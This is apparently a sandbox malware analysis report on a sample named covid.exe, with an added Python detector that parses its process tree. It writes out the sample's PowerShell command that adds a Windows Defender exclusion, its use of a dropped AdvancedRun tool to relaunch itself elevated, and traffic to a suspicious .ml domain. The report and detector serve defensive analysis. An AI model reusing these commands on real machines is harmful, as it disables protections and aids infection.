Analysis Report covid.exe

Overview

General Information

Sample Name:covid.exe
Analysis ID:393947
MD5:99e3b458dee79b33209d39d19692ae08
SHA1:63b68db39d6e39be7564b2fb28f1a3070b127444
SHA256:87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w10x64
  • covid.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: 99E3B458DEE79B33209D39D19692AE08)
    • AdvancedRun.exe (PID: 3192 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5528 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6176 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6224 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6640 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup
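
The process tree is the part of this report a detection engineer keys on: covid.exe drops the NirSoft AdvancedRun utility (the AdvancedRun.pdb path and the www.nirsoft.net string further down identify it) into a GUID-named Temp directory, uses it to run test.bat, spawns powershell.exe twice to add a Windows Defender exclusion for its own path, and then uses a second, GUID-renamed copy of the same binary (identical MD5) to re-launch covid.exe itself with /RunAs 8. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code. It parses process-tree lines in the format of the Startup section (the sample lines are constructed from the tree above, with the Temp directory names shortened) and flags the Defender exclusion, any process that is AdvancedRun by hash or by its command-line switches, a renamed copy of it, and a launch whose target is one of its own ancestors. The rule names, the Temp-path heuristic and the parsing regex are the example's own; the only hash it knows is the one the report lists for the dropped tool, and the /RunAs value is reported verbatim rather than interpreted because the report does not document the tool's account codes.

```python
"""Flag the behaviours visible in the process tree above: a Defender exclusion
added from PowerShell, the dropped NirSoft AdvancedRun tool (also when renamed),
and AdvancedRun re-launching its own ancestor. Added example, not report code."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterator, Optional

# Constructed sample input in the shape of the Startup section above
# (image, PID, cmdline, MD5). Nesting is encoded by two-space indents and the
# GUID Temp directory names are shortened; the tool MD5 is the one the report lists.
SAMPLE_TREE = r"""
covid.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: 99E3B458DEE79B33209D39D19692AE08)
  AdvancedRun.exe (PID: 3192 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    AdvancedRun.exe (PID: 5528 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a\AdvancedRun.exe' /SpecialRun 4101d8 3192 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  powershell.exe (PID: 6176 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6224 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
"""

LINE_RE = re.compile(
    r"^(?P<indent> *)(?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) "
    r"MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)
# MD5 of the dropped AdvancedRun binary as listed in the report; both the
# AdvancedRun.exe copy and the GUID-named copy carry it.
ADVANCEDRUN_MD5 = {"17FC12902F4769AF3A9271EB4E2DACCE"}
ADVANCEDRUN_SWITCHES = ("/EXEFilename", "/RunAs", "/Run")
TEMP_MARKER = "\\appdata\\local\\temp\\"   # heuristic: tool staged in the user's Temp


@dataclass
class Process:
    pid: int
    image: str
    cmdline: str
    md5: str
    parent: Optional[Process] = None

    def image_path(self) -> str:
        """Image path from the cmdline (first quoted token, else first word), lower-cased."""
        m = re.match(r"'([^']+)'", self.cmdline)
        return (m.group(1) if m else self.cmdline.split()[0]).lower()

    def ancestors(self) -> Iterator[Process]:
        p = self.parent
        while p is not None:
            yield p
            p = p.parent


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def parse_tree(text: str) -> list[Process]:
    """Turn indented tree lines into Process objects with parent links."""
    procs: list[Process] = []
    stack: list[tuple[int, Process]] = []   # (indent, process) of the open branch
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if not m:
            continue
        indent = len(m.group("indent"))
        while stack and stack[-1][0] >= indent:
            stack.pop()
        proc = Process(int(m.group("pid")), m.group("image"), m.group("cmd"),
                       m.group("md5").upper(), stack[-1][1] if stack else None)
        procs.append(proc)
        stack.append((indent, proc))
    return procs


def check_defender_exclusion(p: Process) -> list[Finding]:
    """powershell.exe adding a Defender exclusion (path, process or extension)."""
    if p.image.lower() != "powershell.exe" or not re.search(r"add-mppreference", p.cmdline, re.I):
        return []
    m = re.search(r"-exclusion(path|process|extension)\s+(?:'([^']+)'|(\S+))", p.cmdline, re.I)
    if not m:
        return []
    parent = p.parent.image if p.parent else "?"
    return [Finding("defender_exclusion", p.pid,
                    f"{m.group(1).lower()} exclusion for {m.group(2) or m.group(3)} "
                    f"added by {p.image} spawned from {parent}")]


def check_advancedrun(p: Process) -> list[Finding]:
    """AdvancedRun by hash or switches; renamed copies; launches of an ancestor."""
    cmd = p.cmdline
    if p.md5 not in ADVANCEDRUN_MD5 and not all(s in cmd for s in ADVANCEDRUN_SWITCHES):
        return []
    out: list[Finding] = []
    target = re.search(r"/EXEFilename '([^']+)'", cmd)
    runas = re.search(r"/RunAs (\d+)", cmd)
    from_temp = TEMP_MARKER in p.image_path()
    if target:
        out.append(Finding("advancedrun_launch", p.pid,
                           f"runs {target.group(1)} with /RunAs {runas.group(1) if runas else '?'}"
                           f"{' from a Temp directory' if from_temp else ''}"))
    else:   # e.g. the /SpecialRun child the tool spawns for itself
        out.append(Finding("advancedrun_helper", p.pid, cmd))
    if p.image.lower() != "advancedrun.exe":
        out.append(Finding("renamed_tool", p.pid, f"AdvancedRun running as {p.image}"))
    if target:
        tgt = target.group(1).lower()
        for a in p.ancestors():
            if a.image_path() == tgt:
                out.append(Finding("self_relaunch", p.pid,
                                   f"re-launches ancestor {a.image} (PID {a.pid}) via AdvancedRun"))
                break
    return out


def scan(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for p in parse_tree(text):
        findings += check_defender_exclusion(p)
        findings += check_advancedrun(p)
    return findings


def summarize(findings: list[Finding]) -> dict[str, list[int]]:
    """rule name -> PIDs that triggered it, in tree order."""
    by_rule: dict[str, list[int]] = {}
    for f in findings:
        by_rule.setdefault(f.rule, []).append(f.pid)
    return by_rule


if __name__ == "__main__":
    for f in scan(SAMPLE_TREE):
        print(f"[{f.rule}] PID {f.pid}: {f.detail}")
```

Run stand-alone it prints one line per finding for the constructed tree. The same parent/child and command-line logic transfers to Sysmon event ID 1 or Windows Security event 4688 records, where the equivalent fields are the parent process ID, image and command line; on a live host the exclusion the first rule flags is visible in the ExclusionPath list returned by Get-MpPreference.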

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: covid.exe | Virustotal: Detection: 40%
Source: covid.exe | ReversingLabs: Detection: 34%
Machine Learning detection for sample
Source: covid.exe | Joe Sandbox ML: detected
Source: covid.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb | source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1 | UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: mmwrlridbhmibnr.ml | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1 | UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: mmwrlridbhmibnr.ml
Source: Joe Sandbox View | IP Address: 172.67.220.147
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
Source: unknown | DNS traffic detected: queries for: mmwrlridbhmibnr.ml
Source: covid.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: covid.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 0000000F.00000002.432355144.0000000002DF8000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: covid.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: covid.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: covid.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: covid.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: covid.exe, 00000000.00000003.236314820.0000000005B22000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6cc8150004891
Source: covid.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: covid.exe | String found in binary or memory: http://ocsp.digicert.com0O
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: http://schema.org/BreadcrumbList
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: http://schema.org/ListItem
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: http://schema.org/NewsArticle
Source: powershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: covid.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr | String found in binary or memory: http://www.nirsoft.net/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://felix.data.tm-awx.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/ded/script.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
